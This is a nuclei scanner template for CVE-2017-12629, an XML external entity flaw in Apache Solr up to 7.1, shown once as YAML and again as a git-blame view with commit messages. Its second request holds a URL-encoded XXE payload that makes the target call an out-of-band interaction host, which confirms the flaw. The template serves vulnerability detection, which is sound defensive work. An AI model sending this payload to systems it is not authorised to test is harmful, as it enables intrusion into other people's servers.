nuclei-templates/cves/2017/CVE-2017-12629.yaml

id: CVE-2017-12629

info:
  name: Apache Solr <= 7.1 XML entity injection
  author: dwisiswant0
  severity: critical
  tags: cve,cve2017,solr,apache,oob,xxe
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
    - https://twitter.com/honoki/status/1298636315613974532
    - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
    - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE

requests:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

    extractors:
      - type: regex
        internal: true
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'
:fire: Add CVE-2017-12629 2020-08-28 03:46:31 +00:00			`id: CVE-2017-12629`

			`info:`
Fixing CVE-2017-12629 2021-08-09 15:25:06 +00:00			`name: Apache Solr <= 7.1 XML entity injection`
:fire: Add CVE-2017-12629 2020-08-28 03:46:31 +00:00			`author: dwisiswant0`
			`severity: critical`
Fixing CVE-2017-12629 2021-08-09 15:25:06 +00:00			`tags: cve,cve2017,solr,apache,oob,xxe`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2017-12629`
			`- https://twitter.com/honoki/status/1298636315613974532`
			`- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE`
			`- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE`
:fire: Add CVE-2017-12629 2020-08-28 03:46:31 +00:00
			`requests:`
RAW requests 2021-04-27 11:25:09 +00:00			`- raw:`
			`- \|`
Fixing CVE-2017-12629 2021-08-09 15:25:06 +00:00			`GET /solr/admin/cores?wt=json HTTP/1.1`
RAW requests 2021-04-27 11:25:09 +00:00			`Host: {{Hostname}}`

			`- \|`
Fixing CVE-2017-12629 2021-08-09 15:25:06 +00:00			`GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1`
RAW requests 2021-04-27 11:25:09 +00:00			`Host: {{Hostname}}`
Payload and matcher update 2021-04-27 11:07:02 +00:00
:fire: Add CVE-2017-12629 2020-08-28 03:46:31 +00:00			`matchers:`
			`- type: word`
Fixing CVE-2017-12629 2021-08-09 15:25:06 +00:00			`part: interactsh_protocol # Confirms the HTTP Interaction`
:fire: Add CVE-2017-12629 2020-08-28 03:46:31 +00:00			`words:`
Fixing CVE-2017-12629 2021-08-09 15:25:06 +00:00			`- "http"`

			`extractors:`
			`- type: regex`
			`internal: true`
			`name: core`
			`group: 1`
			`regex:`
			`- '"name"\:"(.*?)"'`